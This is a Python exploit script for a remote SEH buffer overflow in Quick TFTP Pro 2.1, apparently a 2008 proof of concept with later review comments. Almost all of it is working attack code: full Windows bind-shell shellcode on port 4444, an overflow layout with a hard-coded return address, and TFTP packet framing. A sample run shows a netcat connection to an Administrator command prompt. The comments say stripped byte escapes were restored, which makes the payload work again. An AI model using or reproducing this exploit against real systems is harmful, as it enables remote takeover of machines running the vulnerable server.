
# Title : Quick TFTP Pro 2.1 Remote SEH Overflow Exploit (0day)
# Published : 2008-03-26
# Author : muts


#!/usr/bin/python
# Quick TFTP Pro 2.1 SEH Overflow (0day)
# Tested on Windows XP SP2. 
# Coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/quick-tftp-poc.py.txt
#########################################################
# bt ~ # quickftp.py
# [*] Quick TFTP Pro 2.1 SEH Overflow (0day)
# [*] http://www.offensive-security.com
# [*] Sending evil packet, ph33r
# [*] Check port 4444 for bindshell
# bt ~ # nc -v 172.16.167.130 4444
# (UNKNOWN) [172.16.167.130] 4444 (krb524) open
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\Administrator>
##########################################################
import socket
import struct
import sys

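# Target. The PoC hard-codes the author's lab VM; main() lets the first
# command-line argument override it so the constant need not be edited.
host = '172.16.167.134'
port = 69  # TFTP listens on UDP/69

# The filename is not the overflow vector here - the oversized "mode" field is.
filename = b"pwnd"

# windows/shell_bind_tcp - 317 bytes
# http://www.metasploit.com
# EXITFUNC=thread, LPORT=4444
#
# NOTE(review): the "\x" escapes were stripped when this listing was scraped
# ("xfcx6a..."), which turned the payload into harmless ASCII text. They are
# restored below; the byte count matches the 317 bytes the generator reported.
# A bind shell is reachable by anyone who can reach TCP/4444 on the victim -
# run this only inside an isolated lab.
shell = (b"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b"
         b"\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01"
         b"\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07"
         b"\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f"
         b"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b"
         b"\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c"
         b"\x8b\x70\x1c\xad\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff"
         b"\xd6\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0"
         b"\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08"
         b"\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53"
         b"\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x66\x68\x11\x5c\x66"
         b"\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff\xd6\x6a\x10\x51"
         b"\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53\x55\xff\xd0"
         b"\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff\xd0\x93"
         b"\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64\x66"
         b"\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
         b"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38"
         b"\xab\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57"
         b"\x52\x51\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9"
         b"\x05\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83"
         b"\xc4\x64\xff\xd6\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6"
         b"\xff\xd0")

# SEH-overwrite layout of the TFTP "mode" field (header says tested on
# Windows XP SP2 only):
#   1019 bytes of filler up to the SEH record,
#   nSEH = jmp short +8 (\xeb\x08) plus two nops - skips over the handler slot,
#   SEH  = 0x74d31458 written little-endian; presumably a pop/pop/ret gadget.
#          The module it lives in is not recorded, so this address is specific
#          to that build and must be re-derived for any other OS/service pack.
#   16 nops as a landing pad, then the payload.
nseh = b"\xeb\x08\x90\x90"
seh = b"\x58\x14\xd3\x74"
mode = b"A" * 1019 + nseh + seh + b"\x90" * 16 + shell


def tftp_request(opcode, filename, mode):
    """Frame a TFTP request (RFC 1350): 2-byte big-endian opcode, then the
    NUL-terminated filename and NUL-terminated mode strings.

    The scraped listing had lost the two "\\x00" terminators (they appeared as
    empty strings); without them the server cannot split the fields.
    """
    return struct.pack("!H", opcode) + filename + b"\x00" + mode + b"\x00"


# Opcode 2 = WRQ (write request); the overflow is carried in the mode field.
muha = tftp_request(2, filename, mode)


def main(argv=None):
    """Send the single malicious WRQ datagram and tell the operator where to
    connect. Exits with status 1 if a UDP socket cannot be created.

    argv: command-line vector; argv[1], if present, replaces the default host.
    """
    argv = sys.argv if argv is None else argv
    target = argv[1] if len(argv) > 1 else host

    print("[*] Quick TFTP Pro 2.1 SEH Overflow (0day)")
    print("[*] http://www.offensive-security.com")

    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    except socket.error as exc:  # was a bare except that hid the reason
        print("socket() failed: %s" % exc)
        sys.exit(1)

    try:
        print("[*] Sending evil packet, ph33r")
        # UDP: one datagram, no handshake and no delivery confirmation, so a
        # missing shell says nothing about whether the packet even arrived.
        s.sendto(muha, (target, port))
    finally:
        s.close()  # the original never released the socket
    print("[*] Check port 4444 for bindshell")


if __name__ == "__main__":
    main()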
